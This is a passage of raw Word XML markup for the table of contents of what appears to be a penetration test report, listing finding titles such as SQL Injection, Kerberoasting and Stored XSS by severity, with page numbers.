          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5C74C557" w14:textId="79ED6E72">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc848952682">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: SQL Injection</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc848952682 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2BECD481" w14:textId="5A7269B6">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc878201856">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: FTP Credential Leak</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc878201856 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2519A534" w14:textId="5AAB18F7">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1869861156">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: UAC Disabled</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1869861156 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="41ADBC40" w14:textId="5A2BD649">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1016136198">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Excessive Sudo Permissions</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1016136198 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="011CE2A4" w14:textId="0410A5EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1386653531">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: SMB Signing Disabled</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1386653531 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="21D657A6" w14:textId="5E8E0680">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc46213415">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Medium:</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc46213415 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3BF63D0D" w14:textId="2FC23B59">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc395907552">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Kerberoasting</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc395907552 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5B561811" w14:textId="6279BFCF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc722673958">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Server-Side Request Forgery</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc722673958 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7E56F0E3" w14:textId="5420BFCF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc889703594">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Windows Defender Disabled</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc889703594 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="07210E02" w14:textId="4EF7F960">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1996611598">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Insecure Direct Object Reference (IDOR)</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1996611598 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="68E90589" w14:textId="0669958F">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1024825530">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: File Disclosure</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1024825530 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="71E5A817" w14:textId="574C9C07">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40876704">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Default Credentials</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc40876704 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5CE6A799" w14:textId="74EB395C">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1418800662">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Hard-Coded Credentials in Application</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1418800662 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7DE872EE" w14:textId="78D25CA9">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc2048008788">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: AS-REP Roasting</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc2048008788 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7DA0942D" w14:textId="44DA1A86">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc317158847">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Local File Inclusion</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc317158847 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="04B530E3" w14:textId="55EE0095">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1458346857">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Self-Signed HTTP Certificate</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1458346857 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>68</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="59FBE14D" w14:textId="271B08FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1130276994">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Stored XSS (no cookies)</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1130276994 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>70</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="12DF1D44" w14:textId="3B4D1967">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc442606722">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>M1: Reflective XSS</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc442606722 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>72</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="565082C7" w14:textId="43871CAE">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1170913175">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>I1: Excessively Privileged Application</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1170913175 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>73</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="54BA352F" w14:textId="38322B7D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1897433115">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>I1: Anonymous FTP login</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1897433115 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>75</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3D8A1623" w14:textId="4644D01C">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc906571342">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>I1: SMB Share Guest Access</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc906571342 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>77</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5E25DE7D" w14:textId="734BF42D">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc116069666">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>I1: Exposed API Documentation</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc116069666 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>79</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="443C8A68" w14:textId="5F7C58B7">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc2073184599">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>I1: Outdated TLS Version</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc2073184599 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>81</w:t>
        </w:r>
        <w:r>
